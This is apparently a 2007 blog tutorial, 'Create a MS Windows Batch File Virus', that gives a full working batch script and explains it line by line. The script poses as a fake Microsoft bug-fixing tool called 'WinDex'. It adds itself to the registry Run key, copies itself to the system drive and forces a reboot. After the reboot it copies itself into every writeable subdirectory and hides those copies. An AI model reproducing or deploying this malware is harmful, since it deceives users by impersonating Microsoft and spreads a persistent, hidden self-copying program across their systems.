Friday, March 30, 2007

HowTo - Create a MS Windows Batch File Virus

Before we begin writing the virus you should open up an instance of MS Notepad by one of the following ways, or some other way you prefer:



1. Start->Run->Type in notepad

2. Start->Accessories->Notepad





The following scripts contents will be explained in the next step of this instructable, thus composes the virus:



@ECHO OFF

SET SD=%SYSTEMDRIVE%\

REG QUERY HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v WinDex > %SD%NULL



REM If the registry key does not exist then this is the first run of the script

IF %ERRORLEVEL% NEQ 0 (

CLS

ECHO Thank you for using Microsoft WinDex v1.0 - This program

is a quick checker for any of the latest discovered bugs in the

Microsoft Windows XP SP1 Operating System. Once a bug is

detected, it'll append it as an entry in a list. Once the

program is done executing it'll attempt to connect to

microsoft.com and download the appropriate fixes. Thank you for

using WinDex.



PAUSE



ECHO.

ECHO.

ECHO Initialising components, please wait....

ECHO.

ECHO.

ECHO.



REM Add the registry "WinDex" registry key and data; The REG_SZ type is used by default

REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v WinDex /d "%SD%%~nx0"



REM If the current directory is not equal to the system drive directory, copy thyself to system directory

IF NOT "%CD%"=="%SD%" COPY /Y %0 %SD% > %SD%NULL

GOTO REBOOT

)



CLS

REM The following is the section that will be executed on next boot

ECHO WinDex will now apply the bug fixes to your system, this may take a while....



REM You can use xcopy, which would be easier and more options are offered, but I decided to do it this way

FOR /R "%CD%" %%i IN (.) DO IF NOT "%%i"=="%CD%" COPY /Y %SD%%~nx0 %%~si > %SD%NULL

FOR /R "%CD%" %%i IN (.) DO ATTRIB +h %%~si\%~nx0

CLS



GOTO END



:REBOOT

SHUTDOWN -c "Windows will now restart to apply bug fixes.... Please wait" -r -t 5

GOTO END



:END

DEL /Q %SD%NULL

EXIT





Now once you've copy-and-pasted the above script into notepad, save it as WinDex.BAT. Because this script was created so that it'd still function no matter what name it is given, you can make up your own name if desired.



If you decide to execute this script, I suggest you REM out or just omit the line that ATTRIB's the files so that they're hidden out, because it would be a bit more difficult to search for and would be seemingly easier to use a standard DIR command or a standard file search.



If you do execute this script and allow it to run without rendering the files hidden, you can simply to a Windows search and delete all the copied files except, perhaps, the one you want to keep, or etc.



This is dedicated to explaining what the batch file virus does. We'll start with the first line:



@ECHO OFF



If you've ever executed a batch file before and you didn't have the above line as the first line of the batch file and echo is on, then you'd probably notice that every command executed in the script will show up on the prompt as the batch file is executed. The above line simply tells the batch intepreter to turn echo off so the commands viewable to the user.



SET SD=%SYSTEMDRIVE%\

REG QUERY HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v WinDex > %SD%NULL



Because I used the %SYSTEMDRIVE% environment variable quite a bit in this program, I reckoned it'd be much easier to set a variable with its contents so that I don't have to keep writing the "%SYSTEMDRIVE%" label. As for the REG QUERY.... line, it queries the MS Windows registry Local Machine hive's subsequent Run Key for the value of "WinDex". This value doesn't exist on the first run of the program, so I query it and as you'll see, I check the %ERRORLEVEL% to see if the command was successful, and if not, it means that it doesn't exist. The > portion redirects the output to a file under the system drive direcotry named NULL so that the user doesn't see the error generated by the REG QUERY in case it doesn't exist.



IF %ERRORLEVEL% NEQ 0 (

CLS

ECHO Thank you for using Microsoft WinDex v1.0 - This program is a quick checker for any of the latest discovered bugs in the Microsoft Windows XP SP1 Operating System. Once a bug is detected, it'll append it as an entry in a list. Once the program is done executing it'll attempt to connect to microsoft.com and download the appropriate fixes. Thank you for using WinDex.



PAUSE



ECHO.

ECHO.

ECHO Initialising components, please wait....

ECHO.

ECHO.

ECHO.



REM Add the registry "WinDex" registry key and data; The REG_SZ type is used by default

REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v WinDex /d "%SD%%~nx0"



REM If the current directory is not equal to the system drive directory, copy thyself to system directory

IF NOT "%CD%"=="%SD%" COPY /Y %0 %SD% > %SD%NULL

GOTO REBOOT

)



As previously mentioned, I condition the %ERRORLEVEL% Global variable to see if it contains any other value than 1. The errorlevel variable holds the return value of the most recent executed command\program, which was the REG QUERY. The "IF %ERRORLEVEL% NEQ 0 (..." part essentially says this, "If the value stored in errorlevel is NOT equal to 0, then execute the lines within the following opening and closing parenthesis.



Now if the this is the first run of the script and thus the "WinDex" registry value doesn't exist, then it first echo's the header of the program. The "ECHO." is used to echo a blank line. Now, since we want the program to run automatically on next boot, we use the REG ADD.... command to insert a new value under the Run key labeled "WinDex" - which we condition - and insert the path to the batch file program under the system drive. In case you were not aware, the %0 variable holds the name of the current instance of the batch file script. When you use the %0 variable in a batch script, it is expanded as the full path name to the program (i.e. C:\Documents and Settings\....\Name_Of_Batch.BAT) and by use the syntax %~nx0 simply expands to the name of the batch file, and omits the path junk.



Next it'll check to current directory using the %CD% enivornment variable and if it is not equal to the system drive, it copies itself to the system directory and redirects the output to the aforementioned NULL file. Then it jumps or GOTO's to the REBOOT section of the batch file, under which simply reboots the system.



CLS

REM The following is the section that will be executed on next boot

ECHO WinDex will now apply the bug fixes to your system, this may take a while....



REM You can use xcopy, which would be easier and more options are offered, but I decided to do it this way

FOR /R "%CD%" %%i IN (.) DO IF NOT "%%i"=="%CD%" COPY /Y %SD%%~nx0 %%~si > %SD%NULL

FOR /R "%CD%" %%i IN (.) DO ATTRIB +h %%~si\%~nx0

CLS



In case you didn't know, the CLS command clears the command prompt terminal screen. Now if this is the second run, the run after the system was rebooted, then this section isn't bypassed. As you'll see a message is indicated before the system was rebooted stating that the system needs to restart in order to apply the bug fixes, and as such, we ECHO a message indicating that the fixes are now being applied.



Now the FOR loop might be intimidating, but rest easy it is really not that difficult to understand. This for loop will transverse through every directory rooted under the current direcotry (Defualt) or the director specified after the /R switch. In this case I just specified the "%CD%" variable for better clarity, in my opinion. And the currrent directory path scanned is held in the %%i variable. Now if we overwrite the Batch File that is currently being run, then the batch file will cease executing. Although in an executable, it doesn't really matter because the processes is running in its own space in main memory, I just included it in case one wants to keep it as a batch script. Therefore I check to see if the contents of the %%i variable are equal to the current directory of the batch script, and if it isn't, copies itself to that directory. In effect, this will copy the WinDex.BAT or whatever you'd named it, to every writeable directory in the system. As usual, I redirected to the output to the NULL file.



The following for loop will transvers again but instead of spreading, it'll add a extra touch and hide all the copied scripts, or exe, so that it normally can't be seen in the GUI (i.e. Windows Explorer) or from a standard DIR command. If you're experiementing with this script, I suggest you REM this for loop because it'll be more difficult to remove all when they're hidden.



Last the %%~si syntax expands %%i, which holds the currently scanned directory from the the for loop, to its short name.



GOTO END



:REBOOT

SHUTDOWN -c "Windows will now restart to apply new fixes.... Please wait" -r -t 5

GOTO END



:END

DEL /Q %SD%NULL

EXIT



Now this part will jump to the END label and quitely (/Q) delete the NULL file and then exit the script and close the prompt window. Then we define the REBOOT label (:REBOOT) which reboots and goto's end. The SHUTDOWN -c.... generates a dialog box containing the countdown, which is 5 seconds, until the system reboots, and also contains the message following the -c switch.



The END label (:END), as mentioned previously, quitely delets the NULL file we've been using to redirect output then exits.



Well that concludes this instructable. Cheers!



From



No comments:

Post a Comment